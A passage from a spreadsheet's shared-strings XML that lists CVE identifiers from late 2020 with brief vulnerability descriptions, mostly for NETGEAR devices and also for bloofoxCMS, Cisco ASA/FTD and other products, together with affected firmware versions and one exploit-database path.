    <t>CVE-2020-35759</t>
  </si>
  <si>
    <t>bloofoxCMS 0.5.2.1 is infected with a CSRF Attack that leads to an attacker editing any file content (Locally/Remotely).</t>
  </si>
  <si>
    <t>CVE-2020-35760</t>
  </si>
  <si>
    <t>bloofoxCMS 0.5.2.1 is infected with Unrestricted File Upload that allows attackers to upload malicious files (ex: php files).</t>
  </si>
  <si>
    <t>CVE-2020-35761</t>
  </si>
  <si>
    <t>bloofoxCMS 0.5.2.1 is infected with XSS that allows remote attackers to execute arbitrary JS/HTML Code.</t>
  </si>
  <si>
    <t>CVE-2020-35762</t>
  </si>
  <si>
    <t>bloofoxCMS 0.5.2.1 is infected with Path traversal in the 'fileurl' parameter that allows attackers to read local files.</t>
  </si>
  <si>
    <t>CVE-2020-35765</t>
  </si>
  <si>
    <t>doFilter in com.adventnet.appmanager.filter.UriCollector in Zoho ManageEngine Applications Manager through 14930 allows an authenticated SQL Injection via the resourceid parameter to showresource.do.</t>
  </si>
  <si>
    <t>CVE-2020-35766</t>
  </si>
  <si>
    <t>The test suite in libopendkim in OpenDKIM through 2.10.3 allows local users to gain privileges via a symlink attack against the /tmp/testkeys file (related to t-testdata.h, t-setup.c, and t-cleanup.c). NOTE: this is applicable to persons who choose to engage in the "A number of self-test programs are included here for unit-testing the library" situation.</t>
  </si>
  <si>
    <t>CVE-2020-35769</t>
  </si>
  <si>
    <t>miniserv.pl in Webmin 1.962 on Windows mishandles special characters in query arguments to the CGI program.</t>
  </si>
  <si>
    <t>CVE-2020-3577</t>
  </si>
  <si>
    <t>A vulnerability in the ingress packet processing path of Cisco Firepower Threat Defense (FTD) Software for interfaces that are configured either as Inline Pair or in Passive mode could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient validation when Ethernet frames are processed. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device. A successful exploit could allow the attacker do either of the following: Fill the /ngfw partition on the device: A full /ngfw partition could result in administrators being unable to log in to the device (including logging in through the console port) or the device being unable to boot up correctly. Note: Manual intervention is required to recover from this situation. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition. Cause a process crash: The process crash would cause the device to reload. No manual intervention is necessary to recover the device after the reload.</t>
  </si>
  <si>
    <t>exploits/java/webapps/49762.txt</t>
  </si>
  <si>
    <t>CITSmart ITSM 9.1.2.22 - LDAP Injection</t>
  </si>
  <si>
    <t>2021-04-14</t>
  </si>
  <si>
    <t>CVE-2020-35773</t>
  </si>
  <si>
    <t>The site-offline plugin before 1.4.4 for WordPress lacks certain wp_create_nonce and wp_verify_nonce calls, aka CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-35774</t>
  </si>
  <si>
    <t>server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-35775</t>
  </si>
  <si>
    <t>CITSmart before 9.1.2.23 allows LDAP Injection.</t>
  </si>
  <si>
    <t>CVE-2020-35776</t>
  </si>
  <si>
    <t>A buffer overflow in res_pjsip_diversion.c in Sangoma Asterisk versions 13.38.1, 16.15.1, 17.9.1, and 18.1.1 allows remote attacker to crash Asterisk by deliberately misusing SIP 181 responses.</t>
  </si>
  <si>
    <t>CVE-2020-35777</t>
  </si>
  <si>
    <t>NETGEAR DGN2200v1 devices before v1.0.0.58 are affected by command injection.</t>
  </si>
  <si>
    <t>CVE-2020-35778</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by CSRF. This affects GS716Tv3 before 6.3.1.36 and GS724Tv4 before 6.3.1.36.</t>
  </si>
  <si>
    <t>CVE-2020-35779</t>
  </si>
  <si>
    <t>NETGEAR NMS300 devices before 1.6.0.27 are affected by denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-3578</t>
  </si>
  <si>
    <t>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access rule and access parts of the WebVPN portal that are supposed to be blocked. The vulnerability is due to insufficient validation of URLs when portal access rules are configured. An attacker could exploit this vulnerability by accessing certain URLs on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35780</t>
  </si>
  <si>
    <t>CVE-2020-35781</t>
  </si>
  <si>
    <t>CVE-2020-35782</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by lack of access control at the function level. This affects JGS516PE before 2.6.0.48, JGS524Ev2 before 2.6.0.48, JGS524PE before 2.6.0.48, and GS116Ev2 before 2.6.0.48. The TFTP firmware update mechanism does not properly implement firmware validations, allowing remote attackers to write arbitrary data to internal memory.</t>
  </si>
  <si>
    <t>CVE-2020-35783</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by lack of access control at the function level. This affects JGS516PE before 2.6.0.48, GS116Ev2 before 2.6.0.48, JGS524Ev2 before 2.6.0.48, and JGS524PE before 2.6.0.48. The NSDP protocol version allows unauthenticated remote attackers to obtain all the switch configuration parameters by sending the corresponding read requests.</t>
  </si>
  <si>
    <t>CVE-2020-35784</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by lack of access control at the function level. This affects JGS516PE before 2.6.0.48, JGS524PE before 2.6.0.48, JGS524Ev2 before 2.6.0.48, and GS116Ev2 before 2.6.0.48.</t>
  </si>
  <si>
    <t>CVE-2020-35785</t>
  </si>
  <si>
    <t>NETGEAR DGN2200v1 devices before v1.0.0.60 mishandle HTTPd authentication (aka PSV-2020-0363, PSV-2020-0364, and PSV-2020-0365).</t>
  </si>
  <si>
    <t>CVE-2020-35786</t>
  </si>
  <si>
    <t>NETGEAR R7800 devices before 1.0.2.74 are affected by a buffer overflow by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-35787</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40.</t>
  </si>
  <si>
    <t>CVE-2020-35788</t>
  </si>
  <si>
    <t>NETGEAR WAC104 devices before 1.0.4.13 are affected by a buffer overflow by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-35789</t>
  </si>
  <si>
    <t>NETGEAR NMS300 devices before 1.6.0.27 are affected by command injection by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-3579</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-35790</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D7800 before 1.0.1.56, R7800 before 1.0.2.68, R8900 before 1.0.4.26, and R9000 before 1.0.4.26.</t>
  </si>
  <si>
    <t>CVE-2020-35791</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R7800 before 1.0.2.68, R8900 before 1.0.5.2, and R9000 before 1.0.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-35792</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R7500v2 before 1.0.3.48, R8900 before 1.0.5.2, R9000 before 1.0.5.2, and R7800 before 1.0.2.68.</t>
  </si>
  <si>
    <t>CVE-2020-35793</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D7800 before 1.0.1.58, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.5.2, and R9000 before 1.0.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-35794</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBS40V before 2.6.1.4, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-35795</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects AC2100 before 1.2.0.72, AC2400 before 1.2.0.72, AC2600 before 1.2.0.72, CBK40 before 2.5.0.10, CBR40 before 2.5.0.10, D7800 before 1.0.1.58, EAX20 before 1.0.0.36, EAX80 before 1.0.1.62, EX7500 before 1.0.0.68, MK62 before 1.0.5.102, MR60 before 1.0.5.102, MS60 before 1.0.5.102, R6120 before 1.0.0.70, R6220 before 1.1.0.100, R6230 before 1.1.0.100, R6260 before 1.1.0.76, R6330 before 1.1.0.76, R6350 before 1.1.0.76, R6400 before 1.0.1.62, R6400v2 before 1.0.4.98, R6700 before 1.0.2.16, R6700v2 before 1.2.0.72, R6700v3 before 1.0.4.98, R6800 before 1.2.0.72, R6850 before 1.1.0.76, R6900P before 1.3.2.124, R6900 before 1.0.2.16, R6900v2 before 1.2.0.72, R7000 before 1.0.11.106, R7000P before 1.3.2.124, R7200 before 1.2.0.72, R7350 before 1.2.0.72, R7400 before 1.2.0.72, R7450 before 1.2.0.72, R7800 before 1.0.2.74, R7850 before 1.0.5.60, R7900 before 1.0.4.26, R7900P before 1.4.1.62, R7960P before 1.4.1.62, R8000 before 1.0.4.58, R8000P before 1.4.1.62, R8900 before 1.0.5.24, R9000 before 1.0.5.24, RAX120 before 1.0.1.136, RAX15 before 1.0.1.64, RAX20 before 1.0.1.64, RAX200 before 1.0.2.102, RAX45 before 1.0.2.64, RAX50 before 1.0.2.64, RAX75 before 1.0.3.102, RAX80 before 1.0.3.102, RBK12 before 2.6.1.44, RBR10 before 2.6.1.44, RBS10 before 2.6.1.44, RBK20 before 2.6.1.38, RBR20 before 2.6.1.36, RBS20 before 2.6.1.38, RBK40 before 2.6.1.38, RBR40 before 2.6.1.36, RBS40 before 2.6.1.38, RBK50 before 2.6.1.40, RBR50 before 2.6.1.40, RBS50 before 2.6.1.40, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK842 before 3.2.16.6, RBR840 before 3.2.16.6, RBS840 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, RS400 before 1.5.0.48, XR300 before 1.0.3.50, XR450 before 2.3.2.66, XR500 before 2.3.2.66, and XR700 before 1.0.1.34.</t>
  </si>
  <si>
    <t>CVE-2020-35796</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects CBR40 before 2.5.0.10, D6220 before 1.0.0.60, D6400 before 1.0.0.94, D7000v2 before 1.0.0.62, D8500 before 1.0.3.50, DC112A before 1.0.0.48, DGN2200v4 before 1.0.0.114, EAX20 before 1.0.0.36, EAX80 before 1.0.1.62, EX3700 before 1.0.0.84, EX3800 before 1.0.0.84, EX3920 before 1.0.0.84, EX6000 before 1.0.0.44, EX6100 before 1.0.2.28, EX6120 before 1.0.0.54, EX6130 before 1.0.0.36, EX6150 before 1.0.0.46, EX6200 before 1.0.3.94, EX6920 before 1.0.0.54, EX7000 before 1.0.1.90, EX7500 before 1.0.0.68, MK62 before 1.0.5.102, MR60 before 1.0.5.102, MS60 before 1.0.5.102, R6250 before 1.0.4.42, R6300v2 before 1.0.4.42, R6400 before 1.0.1.62, R6400v2 before 1.0.4.98, R6700v3 before 1.0.4.98, R6700 before 1.0.2.16, R6900P before 1.3.2.124, R6900 before 1.0.2.16, R7000 before 1.0.11.106, R7000P before 1.3.2.124, R7100LG before 1.0.0.56, R7850 before 1.0.5.60, R7900 before 1.0.4.26, R7900P before 1.4.1.62, R7960P before 1.4.1.62, R8000 before 1.0.4.58, R8000P before 1.4.1.62, R8300 before 1.0.2.134, R8500 before 1.0.2.134, RAX15 before 1.0.1.64, RAX20 before 1.0.1.64, RAX200 before 1.0.2.102, RAX45 before 1.0.2.32, RAX50 before 1.0.2.32, RAX75 before 1.0.3.102, RAX80 before 1.0.3.102, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK842 before 3.2.16.6, RBR840 before 3.2.16.6, RBS840 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, RBS40V-200 before 1.0.0.46, RBW30 before 2.5.0.4, RS400 before 1.5.0.48, WN2500RPv2 before 1.0.1.56, WN3500RP before 1.0.0.28, WNDR3400v3 before 1.0.1.32, WNR1000v3 before 1.0.2.78, WNR2000v2 before 1.2.0.12, WNR3500Lv2 before 1.2.0.62, and XR300 before 1.0.3.50.</t>
  </si>
  <si>
    <t>CVE-2020-35797</t>
  </si>
  <si>
    <t>NETGEAR NMS300 devices before 1.6.0.27 are affected by command injection by an unauthenticated attacker.</t>
  </si>
  <si>
    <t>CVE-2020-35798</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects R6400v2 before 1.0.4.84, R6700v3 before 1.0.4.84, R6900P before 1.3.2.124, R7000 before 1.0.11.100, R7000P before 1.3.2.124, R7800 before 1.0.2.74, R7850 before 1.0.5.60, R7900 before 1.0.4.26, R7960P before 1.4.1.50, R8000 before 1.0.4.52, R7900P before 1.4.1.50, R8000P before 1.4.1.50, RAX15 before 1.0.1.64, RAX20 before 1.0.1.64, RAX200 before 1.0.1.12, RAX45 before 1.0.2.66, RAX50 before 1.0.2.66, RAX75 before 1.0.3.102, RAX80 before 1.0.3.102, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, RBS850 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RS400 before 1.5.0.48, and XR300 before 1.0.3.50.</t>
  </si>
  <si>
    <t>CVE-2020-35799</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6200 before 1.1.00.32, D7000 before 1.0.1.68, D7800 before 1.0.1.56, DM200 before 1.0.0.61, EX2700 before 1.0.1.52, EX6100v2 before 1.0.1.76, EX6150v2 before 1.0.1.76, EX6200v2 before 1.0.1.74, EX6400 before 1.0.2.140, EX7300 before 1.0.2.140, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6050 before 1.0.1.18, R6080 before 1.0.0.38, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6260 before 1.1.0.40, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R7500v2 before 1.0.3.40, R7800 before 1.0.2.62, R8900 before 1.0.4.12, R9000 before 1.0.4.12, RBK20 before 2.3.0.28, RBR20 before 2.3.0.28, RBS20 before 2.3.0.28, RBK40 before 2.3.0.28, RBR40 before 2.3.0.28, RBS40 before 2.3.0.28, RBK50 before 2.3.0.32, RBR50 before 2.3.0.32, RBS50 before 2.3.0.32, WN2000RPTv3 before 1.0.1.34, WN3000RPv2 before 1.0.0.78, WN3000RPv2 before 1.0.0.78, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNR2000v5 before 1.0.0.70, WNR2020 before 1.1.0.62, XR450 before 2.3.2.32, and XR500 before 2.3.2.32.</t>
  </si>
  <si>
    <t>CVE-2020-3580</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.</t>
  </si>
  <si>
    <t>CVE-2020-35800</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects AC2100 before 1.2.0.72, AC2400 before 1.2.0.72, AC2600 before 1.2.0.72, CBK40 before 2.5.0.10, CBR40 before 2.5.0.10, D6000 before 1.0.0.80, D6220 before 1.0.0.60, D6400 before 1.0.0.94, D7000v2 before 1.0.0.62, D7800 before 1.0.3.48, D8500 before 1.0.3.50, DC112A before 1.0.0.48, DGN2200v4 before 1.0.0.114, DM200 before 1.0.0.66, EAX20 before 1.0.0.36, EAX80 before 1.0.1.62, EX2700 before 1.0.1.58, EX3110 before 1.0.1.68, EX3700 before 1.0.0.84, EX3800 before 1.0.0.84, EX3920 before 1.0.0.84, EX6000 before 1.0.0.44, EX6100v2 before 1.0.1.94, EX6110 before 1.0.1.68, EX6120 before 1.0.0.54, EX6130 before 1.0.0.36, EX6150v1 before 1.0.0.46, EX6150v2 before 1.0.1.94, EX6200v1 before 1.0.3.94, EX6250 before 1.0.0.128, EX6400 before 1.0.2.152, EX6400v2 before 1.0.0.128, EX6410 before 1.0.0.128, EX6920 before 1.0.0.54, EX7000 before 1.0.1.90, EX7300 before 1.0.2.152, EX7300v2 before 1.0.0.128, EX7320 before 1.0.0.128, EX7500 before 1.0.0.68, EX7700 before 1.0.0.210, EX8000 before 1.0.1.224, MK62 before 1.0.5.102, MR60 before 1.0.5.102, MS60 before 1.0.5.102, R6120 before 1.0.0.70, R6220 before 1.1.0.100, R6230 before 1.1.0.100, R6250 before 1.0.4.42, R6260 before 1.1.0.76, R6300v2 before 1.0.4.42, R6330 before 1.1.0.76, R6350 before 1.1.0.76, R6400v1 before 1.0.1.62, R6400v2 before 1.0.4.98, R6700v1 before 1.0.2.16, R6700v2 before 1.2.0.72, R6700v3 before 1.0.4.98, R6800 before 1.2.0.72, R6800 before 1.2.0.72, R6850 before 1.1.0.76, R6900 before 1.0.2.16, R6900P before 1.3.2.124, R6900v2 before 1.2.0.72, R7000 before 1.0.11.106, R7000P before 1.3.2.124, R7100LG before 1.0.0.56, R7200 before 1.2.0.72, R7350 before 1.2.0.72, R7400 before 1.2.0.72, R7450 before 1.2.0.72, R7500v2 before 1.0.3.48, R7800 before 1.0.2.74, R7850 before 1.0.5.60, R7900 before 1.0.4.26, R7900P before 1.4.1.62, R7960P before 1.4.1.62, R8000 before 1.0.4.58, R8000P before 1.4.1.62, R8300 before 1.0.2.134, R8500 before 1.0.2.134, R8900 before 1.0.5.24, R9000 before 1.0.5.24, RAX120 before 1.0.1.136, RAX15 before 1.0.1.64, RAX20 before 1.0.1.64, RAX200 before 1.0.5.24, RAX35 before 1.0.3.80, RAX40 before 1.0.3.80, RAX45 before 1.0.2.64, RAX50 before 1.0.2.64, RAX75 before 1.0.3.102, RAX80 before 1.0.3.102, RBK12 before 2.6.1.44, RBR10 before 2.6.1.44, RBS10 before 2.6.1.44, RBK20 before 2.6.1.38, RBR20 before 2.6.1.36, RBS20 before 2.6.1.38, RBK40 before 2.6.1.38, RBR40 before 2.6.1.38, RBS40 before 2.6.1.38, RBK50 before 2.6.1.40, RBR50 before 2.6.1.40, RBS50 before 2.6.1.40, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK842 before 3.2.16.6, RBR840 before 3.2.16.6, RBS840 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, RBS40V before 2.5.1.6, RBS40V-200 before 1.0.0.46, RBS50Y before 2.6.1.40, RBW30 before 2.5.0.4, RS400 before 1.5.0.48, WN2500RPv2 before 1.0.1.56, WN3000RPv3 before 1.0.2.86, WN3500RPv1 before 1.0.0.28, WNDR3400v3 before 1.0.1.32, WNR1000v3 before 1.0.2.78, WNR2000v2 before 1.2.0.12, XR300 before 1.0.3.50, XR450 before 2.3.2.66, XR500 before 2.3.2.66, and XR700 before 1.0.1.34.</t>
  </si>
  <si>
    <t>CVE-2020-35801</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JGS516PE before 2.6.0.48, JGS524Ev2 before 2.6.0.48, JGS524PE before 2.6.0.48, and GS116Ev2 before 2.6.0.48. A TFTP server was found to be active by default. It allows remote authenticated users to update the switch firmware.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-35802</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by disclosure of sensitive information. This affects CBR40 before 2.5.0.14, RBW30 before 2.6.1.4, RAX75 before 1.0.3.102, RAX80 before 1.0.3.102, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, RBK842 before 3.2.16.6, RBR840 before 3.2.16.6, RBS840 before 3.2.16.6, and RBS40V before 2.6.1.4.</t>
  </si>
  <si>
    <t>CVE-2020-35803</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D6200 before 1.1.00.40, D7000 before 1.0.1.78, R6020 before 1.0.0.46, R6080 before 1.0.0.46, R6120 before 1.0.0.72, R6220 before 1.1.0.100, R6230 before 1.1.0.100, R6260 before 1.1.0.76, R6700v2 before 1.2.0.74, R6800 before 1.2.0.74, R6900v2 before 1.2.0.74, R7450 before 1.2.0.74, AC2100 before 1.2.0.74, AC2400 before 1.2.0.74, and AC2600 before 1.2.0.74.</t>
  </si>
  <si>
    <t>CVE-2020-35804</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D7800 before 1.0.1.58, R7800 before 1.0.2.74, R8900 before 1.0.5.18, R9000 before 1.0.5.18, and XR700 before 1.0.1.34.</t>
  </si>
  <si>
    <t>CVE-2020-35805</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35806</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, RAX120 before 1.0.0.78, RBK22 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, and WN3000RPv2 before 1.0.0.78.</t>
  </si>
  <si>
    <t>CVE-2020-35807</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7800 before 1.0.2.68, RAX120 before 1.0.0.78, RBK22 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, and WN3000RPv2 before 1.0.0.78.</t>
  </si>
  <si>
    <t>CVE-2020-35808</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D6100 before 1.0.0.63, DM200 before 1.0.0.61, R7800 before 1.0.2.52, R8900 before 1.0.4.12, R9000 before 1.0.4.12, WN3000RPv2 before 1.0.0.68, and WNR2000v5 before 1.0.0.66.</t>
  </si>
  <si>
    <t>CVE-2020-35809</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-3581</t>
  </si>
  <si>
    <t>CVE-2020-35810</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35811</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35812</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35813</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, XR700 before 1.0.1.10, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, XR500 before 2.3.2.56, and RAX120 before 1.0.0.78.</t>
  </si>
  <si>
    <t>CVE-2020-35814</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35815</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBK40 before 2.3.5.30, RBK40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35816</t>
  </si>
  <si>
    <t>CVE-2020-35817</t>
  </si>
  <si>
    <t>CVE-2020-35818</t>
  </si>
  <si>
